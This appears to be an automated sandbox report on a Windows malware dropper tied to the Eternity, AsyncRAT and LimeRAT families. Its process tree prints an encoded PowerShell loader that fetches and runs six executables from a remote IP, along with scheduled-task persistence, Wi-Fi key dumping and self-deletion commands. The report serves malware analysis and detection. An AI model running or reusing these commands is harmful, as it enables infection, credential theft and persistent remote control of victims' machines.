Analysis
-
max time kernel
149s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
21-08-2023 13:41
Static task
static1
Behavioral task
behavioral1
Sample
a76c1125dacfbc3915da530751b42959.bin.exe
Resource
win7-20230712-en
General
-
Target
a76c1125dacfbc3915da530751b42959.bin.exe
-
Size
70KB
-
MD5
a76c1125dacfbc3915da530751b42959
-
SHA1
5d7e45a1e91f30f69c585b85676c30969f7227de
-
SHA256
9ab7986388ed985549037d1aa7663f59281f7babdaf9a5312e9653eefc88f7c0
-
SHA512
f606b6280156d5de5ef19b9a24e32cacf871673b8474d3cedbdb59df94fbae41d855db4dde2e7aa97cde6c911408fe2fd9fa10ee0ec342f728371a01df4d40b5
-
SSDEEP
768:GI8h1BxX3dkIoBQ+0fc246aVKyFVKR27z3mO9RQvrEa7xAy4C3XMcS+WRnK4w:f8vdkiCKy+u9RQvTA9rcS+5
Malware Config
Extracted
eternity
http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion
Signatures
-
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
Async RAT payload 10 IoCs
resource yara_rule behavioral2/files/0x00060000000231f9-178.dat asyncrat behavioral2/files/0x00060000000231fc-197.dat asyncrat behavioral2/files/0x00060000000231fc-205.dat asyncrat behavioral2/files/0x00060000000231fc-206.dat asyncrat behavioral2/memory/1948-215-0x0000000000F80000-0x0000000000FC2000-memory.dmp asyncrat behavioral2/memory/3352-186-0x0000000000490000-0x00000000004E0000-memory.dmp asyncrat behavioral2/files/0x00060000000231f9-185.dat asyncrat behavioral2/files/0x00060000000231f9-184.dat asyncrat behavioral2/files/0x000a00000002320c-302.dat asyncrat behavioral2/files/0x000a00000002320c-303.dat asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 15 3876 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 19 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x00060000000231f9-178.dat net_reactor behavioral2/files/0x00060000000231fb-189.dat net_reactor behavioral2/files/0x00060000000231fb-193.dat net_reactor behavioral2/files/0x00060000000231fb-194.dat net_reactor behavioral2/files/0x00060000000231fc-197.dat net_reactor behavioral2/files/0x00060000000231fc-205.dat net_reactor behavioral2/files/0x00060000000231fc-206.dat net_reactor behavioral2/memory/1948-215-0x0000000000F80000-0x0000000000FC2000-memory.dmp net_reactor behavioral2/memory/3932-203-0x0000000000D50000-0x0000000000D92000-memory.dmp net_reactor behavioral2/memory/3352-186-0x0000000000490000-0x00000000004E0000-memory.dmp net_reactor behavioral2/files/0x00060000000231f9-185.dat net_reactor behavioral2/files/0x00060000000231f9-184.dat net_reactor behavioral2/memory/3932-225-0x00000000056E0000-0x00000000056F0000-memory.dmp net_reactor behavioral2/memory/3352-264-0x0000000004DD0000-0x0000000004DE0000-memory.dmp net_reactor behavioral2/memory/3932-268-0x00000000056E0000-0x00000000056F0000-memory.dmp net_reactor behavioral2/files/0x0008000000023211-297.dat net_reactor behavioral2/files/0x0008000000023211-298.dat net_reactor behavioral2/files/0x000a00000002320c-302.dat net_reactor behavioral2/files/0x000a00000002320c-303.dat net_reactor -
Executes dropped EXE 8 IoCs
pid Process 3352 1.exe 3932 2.exe 1948 3.exe 3060 4.exe 2280 5.exe 2760 6.exe 4004 DiscordUppdataRas.exe 4084 DefenderEsxi.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3392 1948 WerFault.exe 95 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3124 schtasks.exe 2416 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 840 timeout.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3736 PING.EXE -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 3876 powershell.exe 3876 powershell.exe 3060 4.exe 2280 5.exe 2280 5.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 3352 1.exe 4004 DiscordUppdataRas.exe 4004 DiscordUppdataRas.exe 4004 DiscordUppdataRas.exe 4004 DiscordUppdataRas.exe 4004 DiscordUppdataRas.exe 4004 DiscordUppdataRas.exe 4004 DiscordUppdataRas.exe 4004 DiscordUppdataRas.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeDebugPrivilege 3876 powershell.exe Token: SeDebugPrivilege 1948 3.exe Token: SeDebugPrivilege 3060 4.exe Token: SeDebugPrivilege 2280 5.exe Token: SeIncreaseQuotaPrivilege 1948 3.exe Token: SeSecurityPrivilege 1948 3.exe Token: SeTakeOwnershipPrivilege 1948 3.exe Token: SeLoadDriverPrivilege 1948 3.exe Token: SeSystemProfilePrivilege 1948 3.exe Token: SeSystemtimePrivilege 1948 3.exe Token: SeProfSingleProcessPrivilege 1948 3.exe Token: SeIncBasePriorityPrivilege 1948 3.exe Token: SeCreatePagefilePrivilege 1948 3.exe Token: SeBackupPrivilege 1948 3.exe Token: SeRestorePrivilege 1948 3.exe Token: SeShutdownPrivilege 1948 3.exe Token: SeDebugPrivilege 1948 3.exe Token: SeSystemEnvironmentPrivilege 1948 3.exe Token: SeRemoteShutdownPrivilege 1948 3.exe Token: SeUndockPrivilege 1948 3.exe Token: SeManageVolumePrivilege 1948 3.exe Token: 33 1948 3.exe Token: 34 1948 3.exe Token: 35 1948 3.exe Token: 36 1948 3.exe Token: SeIncreaseQuotaPrivilege 1948 3.exe Token: SeSecurityPrivilege 1948 3.exe Token: SeTakeOwnershipPrivilege 1948 3.exe Token: SeLoadDriverPrivilege 1948 3.exe Token: SeSystemProfilePrivilege 1948 3.exe Token: SeSystemtimePrivilege 1948 3.exe Token: SeProfSingleProcessPrivilege 1948 3.exe Token: SeIncBasePriorityPrivilege 1948 3.exe Token: SeCreatePagefilePrivilege 1948 3.exe Token: SeBackupPrivilege 1948 3.exe Token: SeRestorePrivilege 1948 3.exe Token: SeShutdownPrivilege 1948 3.exe Token: SeDebugPrivilege 1948 3.exe Token: SeSystemEnvironmentPrivilege 1948 3.exe Token: SeRemoteShutdownPrivilege 1948 3.exe Token: SeUndockPrivilege 1948 3.exe Token: SeManageVolumePrivilege 1948 3.exe Token: 33 1948 3.exe Token: 34 1948 3.exe Token: 35 1948 3.exe Token: 36 1948 3.exe Token: SeDebugPrivilege 3352 1.exe Token: SeDebugPrivilege 4004 DiscordUppdataRas.exe Token: SeDebugPrivilege 4004 DiscordUppdataRas.exe Token: SeDebugPrivilege 4084 DefenderEsxi.exe Token: SeDebugPrivilege 4084 DefenderEsxi.exe -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 2832 wrote to memory of 3876 2832 a76c1125dacfbc3915da530751b42959.bin.exe 84 PID 2832 wrote to memory of 3876 2832 a76c1125dacfbc3915da530751b42959.bin.exe 84 PID 2832 wrote to memory of 3876 2832 a76c1125dacfbc3915da530751b42959.bin.exe 84 PID 3876 wrote to memory of 3352 3876 powershell.exe 93 PID 3876 wrote to memory of 3352 3876 powershell.exe 93 PID 3876 wrote to memory of 3352 3876 powershell.exe 93 PID 3876 wrote to memory of 3932 3876 powershell.exe 94 PID 3876 wrote to memory of 3932 3876 powershell.exe 94 PID 3876 wrote to memory of 3932 3876 powershell.exe 94 PID 3876 wrote to memory of 1948 3876 powershell.exe 95 PID 3876 wrote to memory of 1948 3876 powershell.exe 95 PID 3876 wrote to memory of 3060 3876 powershell.exe 96 PID 3876 wrote to memory of 3060 3876 powershell.exe 96 PID 3876 wrote to memory of 2280 3876 powershell.exe 97 PID 3876 wrote to memory of 2280 3876 powershell.exe 97 PID 3876 wrote to memory of 2280 3876 powershell.exe 97 PID 3876 wrote to memory of 2760 3876 powershell.exe 99 PID 3876 wrote to memory of 2760 3876 powershell.exe 99 PID 3060 wrote to memory of 4172 3060 4.exe 100 PID 3060 wrote to memory of 4172 3060 4.exe 100 PID 4172 wrote to memory of 2456 4172 cmd.exe 102 PID 4172 wrote to memory of 2456 4172 cmd.exe 102 PID 4172 wrote to memory of 2532 4172 cmd.exe 103 PID 4172 wrote to memory of 2532 4172 cmd.exe 103 PID 4172 wrote to memory of 2208 4172 cmd.exe 104 PID 4172 wrote to memory of 2208 4172 cmd.exe 104 PID 3060 wrote to memory of 772 3060 4.exe 105 PID 3060 wrote to memory of 772 3060 4.exe 105 PID 772 wrote to memory of 5060 772 cmd.exe 107 PID 772 wrote to memory of 5060 772 cmd.exe 107 PID 772 wrote to memory of 4536 772 cmd.exe 108 PID 772 wrote to memory of 4536 772 cmd.exe 108 PID 772 wrote to memory of 4972 772 cmd.exe 109 PID 772 wrote to memory of 4972 772 cmd.exe 109 PID 3060 wrote to memory of 3008 3060 4.exe 110 PID 3060 wrote to memory of 3008 3060 4.exe 110 PID 3008 wrote to memory of 4184 3008 cmd.exe 112 PID 3008 wrote to memory of 4184 3008 cmd.exe 112 PID 3008 wrote to memory of 3736 3008 cmd.exe 113 PID 3008 wrote to memory of 3736 3008 cmd.exe 113 PID 3352 wrote to memory of 3436 3352 1.exe 118 PID 3352 wrote to memory of 3436 3352 1.exe 118 PID 3352 wrote to memory of 3436 3352 1.exe 118 PID 3352 wrote to memory of 2668 3352 1.exe 120 PID 3352 wrote to memory of 2668 3352 1.exe 120 PID 3352 wrote to memory of 2668 3352 1.exe 120 PID 3436 wrote to memory of 3124 3436 cmd.exe 122 PID 3436 wrote to memory of 3124 3436 cmd.exe 122 PID 3436 wrote to memory of 3124 3436 cmd.exe 122 PID 2668 wrote to memory of 840 2668 cmd.exe 123 PID 2668 wrote to memory of 840 2668 cmd.exe 123 PID 2668 wrote to memory of 840 2668 cmd.exe 123 PID 3932 wrote to memory of 2416 3932 2.exe 124 PID 3932 wrote to memory of 2416 3932 2.exe 124 PID 3932 wrote to memory of 2416 3932 2.exe 124 PID 3932 wrote to memory of 4004 3932 2.exe 126 PID 3932 wrote to memory of 4004 3932 2.exe 126 PID 3932 wrote to memory of 4004 3932 2.exe 126 PID 2668 wrote to memory of 4084 2668 cmd.exe 127 PID 2668 wrote to memory of 4084 2668 cmd.exe 127 PID 2668 wrote to memory of 4084 2668 cmd.exe 127
Processes
-
C:\Users\Admin\AppData\Local\Temp\a76c1125dacfbc3915da530751b42959.bin.exe"C:\Users\Admin\AppData\Local\Temp\a76c1125dacfbc3915da530751b42959.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZABhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADgANwAuADUAMQAuADIAMQA1AC8AMQAuAGUAeABlACcALAAgADwAIwB1AGoAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAagBtACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHUAZQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEALgBlAHgAZQAnACkAKQA8ACMAYQBhAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AOAA3AC4ANQAxAC4AMgAxADUALwAyAC4AZQB4AGUAJwAsACAAPAAjAHIAaQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB4AHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgBxAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAuAGUAeABlACcAKQApADwAIwBxAHAAYQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgA4ADcALgA1ADEALgAyADEANQAvADMALgBlAHgAZQAnACwAIAA8ACMAcABuAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGgAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHIAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApACkAPAAjAHkAYgBxACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADgANwAuADUAMQAuADIAMQA1AC8ANAAuAGUAeABlACcALAAgADwAIwB6AGsAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAcgB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAdQB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAKQA8ACMAZABwAHQAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AOAA3AC4ANQAxAC4AMgAxADUALwA1AC4AZQB4AGUAJwAsACAAPAAjAGwAcgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBjAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBkAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQAuAGUAeABlACcAKQApADwAIwB6AG4AdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgA4ADcALgA1ADEALgAyADEANQAvADYALgBlAHgAZQAnACwAIAA8ACMAcQB2AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGMAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAGcAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AC4AZQB4AGUAJwApACkAPAAjAHYAcABmACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGoAcgBhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAHAAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAC4AZQB4AGUAJwApADwAIwB1AGgAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AHMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQBxAGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgAuAGUAeABlACcAKQA8ACMAZgBuAHYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcgBkAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGYAcQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMALgBlAHgAZQAnACkAPAAjAHIAdABwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAYgB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB6AHAAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AC4AZQB4AGUAJwApADwAIwBiAG4AeQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBnAHEAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBpAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQAuAGUAeABlACcAKQA8ACMAdgBkAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBuAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAYgBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYALgBlAHgAZQAnACkAPAAjAGsAdAByACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "DefenderEsxi" /tr '"C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "DefenderEsxi" /tr '"C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe"'5⤵
- Creates scheduled task(s)
PID:3124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5407.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:840
-
-
C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe"C:\Users\Admin\AppData\Roaming\DefenderEsxi.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\DiscordUppdataRas.exe'"4⤵
- Creates scheduled task(s)
PID:2416
-
-
C:\Users\Admin\AppData\Roaming\DiscordUppdataRas.exe"C:\Users\Admin\AppData\Roaming\DiscordUppdataRas.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1948 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1948 -s 12724⤵
- Program crash
PID:3392
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All4⤵
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:2456
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵PID:2532
-
-
C:\Windows\system32\findstr.exefindstr All5⤵PID:2208
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile name="65001" key=clear | findstr Key4⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:5060
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile name="65001" key=clear5⤵PID:4536
-
-
C:\Windows\system32\findstr.exefindstr Key5⤵PID:4972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\4.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:4184
-
-
C:\Windows\system32\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:3736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"3⤵
- Executes dropped EXE
PID:2760
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 460 -p 1948 -ip 19481⤵PID:5044
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
294KB
MD52d17306f11167cbbfd6758cfa08ea1cc
SHA1024fa5f6b970601b71dbbb961c5da693d3b61547
SHA256e05d5107861f17ad26b7fec4ed0b48797b1e427f46b8c66e0ee410f354b5b8cf
SHA512715e4bbc55c653f4ba4711fee99a58c99db57240d1a4ee8fdf25852d6e97032f884d1761595081aa687f46c43da843bbe11b4a80adc79da540c18c2aaf50faff
-
Filesize
294KB
MD52d17306f11167cbbfd6758cfa08ea1cc
SHA1024fa5f6b970601b71dbbb961c5da693d3b61547
SHA256e05d5107861f17ad26b7fec4ed0b48797b1e427f46b8c66e0ee410f354b5b8cf
SHA512715e4bbc55c653f4ba4711fee99a58c99db57240d1a4ee8fdf25852d6e97032f884d1761595081aa687f46c43da843bbe11b4a80adc79da540c18c2aaf50faff
-
Filesize
294KB
MD52d17306f11167cbbfd6758cfa08ea1cc
SHA1024fa5f6b970601b71dbbb961c5da693d3b61547
SHA256e05d5107861f17ad26b7fec4ed0b48797b1e427f46b8c66e0ee410f354b5b8cf
SHA512715e4bbc55c653f4ba4711fee99a58c99db57240d1a4ee8fdf25852d6e97032f884d1761595081aa687f46c43da843bbe11b4a80adc79da540c18c2aaf50faff
-
Filesize
247KB
MD5eb2bc869689c92c21e68f3e684ccea37
SHA154ed976bccb60e2ff754c94310a913c3063316a0
SHA256fa6af7e23ad1d78e2fa4ed2d372a0990a78bcc3a49bbd07c75c6ec44e3e8736c
SHA51246d322eefc0eee6555d08a0cb0cdf2e6b1a3400bdc447499484cdd2800c569c73b95e0759f6984c7af38dbb9ba5a8d4ddb5796cd8cc9b0d9bf86f39f16db58a5
-
Filesize
247KB
MD5eb2bc869689c92c21e68f3e684ccea37
SHA154ed976bccb60e2ff754c94310a913c3063316a0
SHA256fa6af7e23ad1d78e2fa4ed2d372a0990a78bcc3a49bbd07c75c6ec44e3e8736c
SHA51246d322eefc0eee6555d08a0cb0cdf2e6b1a3400bdc447499484cdd2800c569c73b95e0759f6984c7af38dbb9ba5a8d4ddb5796cd8cc9b0d9bf86f39f16db58a5
-
Filesize
247KB
MD5eb2bc869689c92c21e68f3e684ccea37
SHA154ed976bccb60e2ff754c94310a913c3063316a0
SHA256fa6af7e23ad1d78e2fa4ed2d372a0990a78bcc3a49bbd07c75c6ec44e3e8736c
SHA51246d322eefc0eee6555d08a0cb0cdf2e6b1a3400bdc447499484cdd2800c569c73b95e0759f6984c7af38dbb9ba5a8d4ddb5796cd8cc9b0d9bf86f39f16db58a5
-
Filesize
241KB
MD5fbd8282aab99fa7ed61994cf74b00980
SHA170818074ddd637e89e712e5935abc02fb5245512
SHA2569f9bd8bb2f3e5872e25d0f64bbb5d2f30776ea1d879949540d51e1cfa94beb71
SHA5128ef28d59d302204d0c1eb404352e5e07861f0a6cd1380faf40fc861377490da88fd6488f815406bda4c284aa75ff3dbe72dba530069075f1107c28dbc99b05e4
-
Filesize
241KB
MD5fbd8282aab99fa7ed61994cf74b00980
SHA170818074ddd637e89e712e5935abc02fb5245512
SHA2569f9bd8bb2f3e5872e25d0f64bbb5d2f30776ea1d879949540d51e1cfa94beb71
SHA5128ef28d59d302204d0c1eb404352e5e07861f0a6cd1380faf40fc861377490da88fd6488f815406bda4c284aa75ff3dbe72dba530069075f1107c28dbc99b05e4
-
Filesize
241KB
MD5fbd8282aab99fa7ed61994cf74b00980
SHA170818074ddd637e89e712e5935abc02fb5245512
SHA2569f9bd8bb2f3e5872e25d0f64bbb5d2f30776ea1d879949540d51e1cfa94beb71
SHA5128ef28d59d302204d0c1eb404352e5e07861f0a6cd1380faf40fc861377490da88fd6488f815406bda4c284aa75ff3dbe72dba530069075f1107c28dbc99b05e4
-
Filesize
338KB
MD592688c692485c7cdf6210332f6670b1f
SHA17aa191d377b5a36db7336fdbdd8c150648243f1c
SHA256abfa66d96469587fb6548e28b4910b5e75ef2bce9c379fa911a81c554591046d
SHA5124efce7b7fd17a63863605c2271dd6796c6f44f0498f1a4641b1c1a714e8f6d0461e6f070f9a85349147982aaca46d944f4ecfb48dad02d0050080958eb356d12
-
Filesize
338KB
MD592688c692485c7cdf6210332f6670b1f
SHA17aa191d377b5a36db7336fdbdd8c150648243f1c
SHA256abfa66d96469587fb6548e28b4910b5e75ef2bce9c379fa911a81c554591046d
SHA5124efce7b7fd17a63863605c2271dd6796c6f44f0498f1a4641b1c1a714e8f6d0461e6f070f9a85349147982aaca46d944f4ecfb48dad02d0050080958eb356d12
-
Filesize
338KB
MD592688c692485c7cdf6210332f6670b1f
SHA17aa191d377b5a36db7336fdbdd8c150648243f1c
SHA256abfa66d96469587fb6548e28b4910b5e75ef2bce9c379fa911a81c554591046d
SHA5124efce7b7fd17a63863605c2271dd6796c6f44f0498f1a4641b1c1a714e8f6d0461e6f070f9a85349147982aaca46d944f4ecfb48dad02d0050080958eb356d12
-
Filesize
194KB
MD5af77bbfa1ce5fc6030cf57cbe2db752e
SHA1713cc815ec0028cdb6490f473b786239d3993877
SHA256649cb49ad9175deac8b0fcecc28ff90ba576cc8804deb190236868c711a60074
SHA512f12ef1c94b57153e6ec82b386f8c15e42ff63ebe2f1ea146464af026341bde3bd6d7e13e82b611fbe6a8395d8cf8270ae4270b94c289fe90f864c5cd2017b91c
-
Filesize
194KB
MD5af77bbfa1ce5fc6030cf57cbe2db752e
SHA1713cc815ec0028cdb6490f473b786239d3993877
SHA256649cb49ad9175deac8b0fcecc28ff90ba576cc8804deb190236868c711a60074
SHA512f12ef1c94b57153e6ec82b386f8c15e42ff63ebe2f1ea146464af026341bde3bd6d7e13e82b611fbe6a8395d8cf8270ae4270b94c289fe90f864c5cd2017b91c
-
Filesize
194KB
